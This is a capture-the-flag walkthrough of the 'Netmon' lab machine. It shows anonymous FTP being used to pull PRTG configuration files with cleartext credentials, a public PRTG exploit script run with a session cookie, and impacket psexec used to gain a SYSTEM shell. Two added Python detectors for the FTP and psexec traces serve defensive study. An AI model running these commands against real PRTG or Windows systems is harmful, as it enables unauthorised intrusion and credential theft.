
Netmon Practice Notes

☕ 3 min · ✍️ IceKam

Environment:

Name: Netmon

OS: Windows

Information Gathering

Scanning the target

$ nmap -A 10.10.10.93

[image: Netmon nmap]

  • The host is Windows Server 2008 R2 - 2012; ports 21 and 80 are open, with a PRTG service deployed.

Getting a shell

Anonymous FTP login

[image: Netmon nmap]

  • Login successful.

User flag

ftp> cd Users
250 CWD command successful.
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
02-25-19  10:44PM       <DIR>          Administrator
11-04-19  03:25AM       <DIR>          Public
226 Transfer complete.
ftp> cd Public
250 CWD command successful.
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
02-03-19  07:05AM       <DIR>          Documents
07-16-16  08:18AM       <DIR>          Downloads
07-16-16  08:18AM       <DIR>          Music
07-16-16  08:18AM       <DIR>          Pictures
11-04-19  03:28AM                   88 tester.txt
02-02-19  11:35PM                   33 user.txt
07-16-16  08:18AM       <DIR>          Videos
226 Transfer complete.
ftp> get user.txt
local: user.txt remote: user.txt
200 PORT command successful.
125 Data connection already open; Transfer starting.
WARNING! 1 bare linefeeds received in ASCII mode
File may not have transferred correctly.
226 Transfer complete.
33 bytes received in 0.32 secs (0.0994 kB/s)

$ cat user.txt
dd58ce67b49e15105×××
  • Got the user flag.

PRTG directory enumeration

[image: Netmon pass]

  • A quick search showed that PRTG stores credentials in cleartext in its configuration file, and the PRTG configuration directory was located.

PRTG password enumeration

$ ftp 10.10.10.152
Connected to 10.10.10.152.
220 Microsoft FTP Service
Name (10.10.10.152:root): Anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> ls -la
200 PORT command successful.
125 Data connection already open; Transfer starting.
11-20-16  09:46PM       <DIR>          $RECYCLE.BIN
02-02-19  11:18PM                 1024 .rnd
11-20-16  08:59PM               389408 bootmgr
07-16-16  08:10AM                    1 BOOTNXT
02-03-19  07:05AM       <DIR>          Documents and Settings
02-25-19  09:15PM       <DIR>          inetpub
11-04-19  12:47AM            738197504 pagefile.sys
07-16-16  08:18AM       <DIR>          PerfLogs
02-25-19  09:56PM       <DIR>          Program Files
02-02-19  11:28PM       <DIR>          Program Files (x86)
02-25-19  09:56PM       <DIR>          ProgramData
02-03-19  07:05AM       <DIR>          Recovery
02-03-19  07:04AM       <DIR>          System Volume Information
02-03-19  07:08AM       <DIR>          Users
02-25-19  10:49PM       <DIR>          Windows
226 Transfer complete.
ftp> cd ProgramData
250 CWD command successful.

ftp> ls -la
200 PORT command successful.
125 Data connection already open; Transfer starting.
02-03-19  07:05AM       <DIR>          Application Data
02-03-19  07:05AM       <DIR>          Desktop
02-03-19  07:05AM       <DIR>          Documents
02-02-19  11:15PM       <DIR>          Licenses
11-20-16  09:36PM       <DIR>          Microsoft
02-02-19  11:18PM       <DIR>          Paessler
02-03-19  07:05AM       <DIR>          regid.1991-06.com.microsoft
07-16-16  08:18AM       <DIR>          SoftwareDistribution
02-03-19  07:05AM       <DIR>          Start Menu
02-02-19  11:15PM       <DIR>          TEMP
02-03-19  07:05AM       <DIR>          Templates
11-20-16  09:19PM       <DIR>          USOPrivate
11-20-16  09:19PM       <DIR>          USOShared
02-25-19  09:56PM       <DIR>          VMware
226 Transfer complete.
ftp> cd "Application Data/Paessler/PRTG Network Monitor"
250 CWD command successful.
ftp> ls -la
200 PORT command successful.
125 Data connection already open; Transfer starting.
02-02-19  11:40PM       <DIR>          Configuration Auto-Backups
11-04-19  12:49AM       <DIR>          Log Database
02-02-19  11:18PM       <DIR>          Logs (Debug)
02-02-19  11:18PM       <DIR>          Logs (Sensors)
02-02-19  11:18PM       <DIR>          Logs (System)
11-04-19  12:49AM       <DIR>          Logs (Web Server)
11-04-19  12:54AM       <DIR>          Monitoring Database
02-25-19  09:54PM              1189697 PRTG Configuration.dat
02-25-19  09:54PM              1189697 PRTG Configuration.old
07-14-18  02:13AM              1153755 PRTG Configuration.old.bak
11-04-19  02:54AM              1722421 PRTG Graph Data Cache.dat
02-25-19  10:00PM       <DIR>          Report PDFs
02-02-19  11:18PM       <DIR>          System Information Database
02-02-19  11:40PM       <DIR>          Ticket Database
02-02-19  11:18PM       <DIR>          ToDo Database
226 Transfer complete.
ftp> get Configuration.old.bak
local: Configuration.old.bak remote: Configuration.old.bak
200 PORT command successful.
550 The system cannot find the file specified.

[image: Netmon admin]

  • After logging in over FTP, the configuration file was downloaded directly and the credentials read from it: account prtgadmin, password PrTg@dmin2018.
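The two weaknesses chained above, anonymous FTP exposing the whole system drive and PRTG keeping credentials in cleartext in its configuration files, are straightforward to detect from the FTP server's own logs. The following is an added example, not code from the original writeup: it parses W3C-style FTP log lines using the file's own `#Fields:` header and alerts on successful anonymous logins and on retrieval of the PRTG configuration files seen in the directory listing above. The field list, the sample lines, the client addresses (10.10.14.x) and the `+`-encoding of spaces in paths are constructed assumptions modelled on IIS FTP logging; adapt the watch list and header to your own server.

```python
import re
from typing import Dict, Iterable, List, Tuple

# Paths whose retrieval over FTP should raise an alert. Constructed for this
# example from the directory listing in the writeup; extend for your estate.
WATCHLIST = [
    re.compile(r"^/ProgramData/Paessler/PRTG Network Monitor/PRTG Configuration", re.I),
    re.compile(r"^/Users/Administrator/", re.I),
]
ANONYMOUS_USERS = {"anonymous", "ftp"}

# Constructed sample log, modelled on IIS FTP W3C logging (spaces in paths are
# '+'-encoded). The client addresses 10.10.14.x are invented for the example.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services
#Fields: date time c-ip cs-username s-ip s-port cs-method cs-uri-stem sc-status
2019-11-04 03:20:11 10.10.14.5 - 10.10.10.152 21 USER anonymous 331
2019-11-04 03:20:12 10.10.14.5 anonymous 10.10.10.152 21 PASS *** 230
2019-11-04 03:20:30 10.10.14.5 anonymous 10.10.10.152 21 CWD /ProgramData 250
2019-11-04 03:21:02 10.10.14.5 anonymous 10.10.10.152 21 RETR /ProgramData/Paessler/PRTG+Network+Monitor/PRTG+Configuration.old.bak 226
2019-11-04 03:25:40 10.10.14.5 anonymous 10.10.10.152 21 RETR /Users/Public/user.txt 226
2019-11-04 04:00:00 10.10.14.9 backupsvc 10.10.10.152 21 PASS *** 230
2019-11-04 04:00:05 10.10.14.9 backupsvc 10.10.10.152 21 RETR /inetpub/wwwroot/index.html 226
"""

Alert = Tuple[str, str, str, str]  # (kind, client ip, user, detail)


def parse_w3c(lines: Iterable[str]) -> List[Dict[str, str]]:
    """Parse W3C extended-log lines using the file's own '#Fields:' header."""
    fields: List[str] = []
    records: List[Dict[str, str]] = []
    for raw in lines:
        line = raw.strip()
        if not line:
            continue
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if line.startswith("#"):
            continue
        values = line.split()
        if not fields or len(values) != len(fields):
            continue  # no header yet or malformed line: skip rather than guess
        records.append(dict(zip(fields, values)))
    return records


def detect(records: Iterable[Dict[str, str]]) -> List[Alert]:
    """Alert on successful anonymous logins and on RETR of watch-listed paths."""
    alerts: List[Alert] = []
    for rec in records:
        method = rec.get("cs-method", "").upper()
        status = rec.get("sc-status", "")
        user = rec.get("cs-username", "-").lower()
        ip = rec.get("c-ip", "-")
        path = rec.get("cs-uri-stem", "").replace("+", " ")
        if method == "PASS" and status == "230" and user in ANONYMOUS_USERS:
            alerts.append(("anonymous-login", ip, user, "FTP anonymous access is enabled"))
        # Flag the attempt whatever the status: a 550 on a sensitive path still
        # shows that someone was probing for it.
        if method == "RETR" and any(p.search(path) for p in WATCHLIST):
            alerts.append(("sensitive-download", ip, user, f"{path} (status {status})"))
    return alerts


if __name__ == "__main__":
    for kind, ip, user, detail in detect(parse_w3c(SAMPLE_LOG.splitlines())):
        print(f"ALERT {kind}: client={ip} user={user} {detail}")
```

On the constructed sample this raises two alerts, one for the anonymous login and one for the PRTG configuration backup. Either alert on a real server points at the same fixes: disable anonymous FTP, never root the FTP site at the system drive, and keep the PRTG data directory (and its `Configuration Auto-Backups`) out of any shared path.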

Login successful

[image: Netmon welcome]

  • The first login attempt failed; trying the password PrTg@dmin2019 succeeded, and the current version was obtained at the same time: 18.1.37.13946

Version info (v2)

[image: Netmon ver]

  • The version can also be found by auditing the page source.

Vulnerability enumeration

$ searchsploit PRTG    
--------------------------------------- ----------------------------------------
 Exploit Title                         |  Path
                                       | (/usr/share/exploitdb/)
--------------------------------------- ----------------------------------------
PRTG Network Monitor 18.2.38 - (Authen | exploits/windows/webapps/46527.sh
PRTG Network Monitor < 18.1.39.1648 -  | exploits/windows_x86/dos/44500.py
PRTG Traffic Grapher 6.2.1 - 'url' Cro | exploits/java/webapps/34108.txt

$ cp /usr/share/exploitdb/exploits/windows/webapps/46527.sh .

$ sed -i -e 's/\r$//' 46527.sh

  • Searched for the exploit directly; note that the script's line endings need converting here (the sed strips the trailing carriage returns), otherwise it can't be used.

Getting access

$ bash 46527.sh -u http://10.10.10.152 -c "GA1.4.145397969.1572851737; _gid=GA1.4.145397969.1572851737; OCTOPUS1813713946=e0U4N0JFRUNFLUQzRkMtNEYwRi1BQjQ2LTRCNDU3NjkzOTA4Q30%3D; _gat=1"

[image: Netmon ok]

  • Obtained an account and password with the highest privileges.

Root flag

$ /opt/impacket/examples/psexec.py [email protected]
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation

Password:
[*] Requesting shares on 10.10.10.152.....
[*] Found writable share ADMIN$
[*] Uploading file hOFlpyyw.exe
[*] Opening SVCManager on 10.10.10.152.....
[*] Creating service jPEV on 10.10.10.152.....
[*] Starting service jPEV.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
nt authority\system

c:\>cd C:\Users\Administrator\Desktop

C:\Users\Administrator\Desktop>dir       
 Volume in drive C has no label.
 Volume Serial Number is 684B-9CE8

 Directory of C:\Users\Administrator\Desktop

02/02/2019  11:35 PM    <DIR>          .
02/02/2019  11:35 PM    <DIR>          ..
02/02/2019  11:35 PM                33 root.txt
               1 File(s)             33 bytes
               2 Dir(s)  12,058,017,792 bytes free

C:\Users\Administrator\Desktop>type root.txt
3018977fb944bf1878f7××××××
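The psexec.py session above leaves a distinctive trace on the target: a service with a 4-letter random name (jPEV) whose binary is an 8-letter random .exe (hOFlpyyw.exe) uploaded to the ADMIN$ share, i.e. dropped straight into %SystemRoot%, and started on demand as LocalSystem. The following is an added example, not part of the original writeup: it scores constructed System-log 7045 (service installed) records against that pattern and only raises an alert when several indicators coincide, so that legitimate short-named services such as Dhcp do not trip it. The event field names, the benign sample services and the scoring threshold are assumptions for the example.

```python
import re
from typing import Dict, List, Tuple

# Pattern left by impacket's psexec.py as seen in the session above: a 4-letter
# random service name and an 8-letter random .exe placed in the ADMIN$ share,
# which maps to %SystemRoot%. Thresholds and field names are our assumptions.
RANDOM_SERVICE_NAME = re.compile(r"^[A-Za-z]{4}$")
SYSTEMROOT_DROP = re.compile(
    r"^(?:\\\\[^\\]+\\ADMIN\$|[A-Za-z]:\\Windows)\\[A-Za-z]{8}\.exe$", re.I
)

# Constructed System-log 7045 (service installed) records: the writeup's
# psexec service plus three benign installs for comparison.
SAMPLE_EVENTS: List[Dict[str, object]] = [
    {"EventID": 7045, "ServiceName": "Spooler",
     "ImagePath": r"C:\Windows\System32\spoolsv.exe",
     "StartType": "auto start", "AccountName": "LocalSystem"},
    {"EventID": 7045, "ServiceName": "jPEV",
     "ImagePath": r"\\127.0.0.1\ADMIN$\hOFlpyyw.exe",
     "StartType": "demand start", "AccountName": "LocalSystem"},
    {"EventID": 7045, "ServiceName": "Dhcp",  # legitimate 4-letter name
     "ImagePath": r"C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted",
     "StartType": "auto start", "AccountName": r"NT AUTHORITY\LocalService"},
    {"EventID": 7045, "ServiceName": "VMTools",
     "ImagePath": r'"C:\Program Files\VMware\VMware Tools\vmtoolsd.exe"',
     "StartType": "auto start", "AccountName": "LocalSystem"},
]


def score_event(event: Dict[str, object]) -> List[str]:
    """Return the reasons a 7045 record resembles a psexec-style install."""
    reasons: List[str] = []
    name = str(event.get("ServiceName", ""))
    image = str(event.get("ImagePath", "")).strip('"')
    if RANDOM_SERVICE_NAME.match(name):
        reasons.append("4-letter random-looking service name")
    if SYSTEMROOT_DROP.match(image):
        reasons.append("8-letter .exe dropped into ADMIN$/%SystemRoot% root")
    if (str(event.get("StartType", "")).lower().startswith("demand")
            and str(event.get("AccountName", "")) == "LocalSystem"):
        reasons.append("on-demand service running as LocalSystem")
    return reasons


def detect(events: List[Dict[str, object]], threshold: int = 2) -> List[Tuple[str, str, List[str]]]:
    """Flag 7045 records that accumulate at least `threshold` reasons.

    A single reason (for example the 4-letter name of the real Dhcp service)
    is not enough on its own, which keeps the false-positive rate down.
    """
    hits: List[Tuple[str, str, List[str]]] = []
    for event in events:
        if event.get("EventID") != 7045:
            continue
        reasons = score_event(event)
        if len(reasons) >= threshold:
            hits.append((str(event["ServiceName"]), str(event["ImagePath"]), reasons))
    return hits


if __name__ == "__main__":
    for name, image, reasons in detect(SAMPLE_EVENTS):
        print(f"ALERT service={name} image={image} reasons={reasons}")
```

On the sample records only jPEV is reported, with all three indicators. The same 7045 event is also a good anchor for correlating with the preceding SMB write to ADMIN$ and the service-control traffic from the same source, which is how a SOC would tie this back to the PRTG credential exposure rather than to a stray admin action.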

Takeaways

Not bad; impacket is really handy.
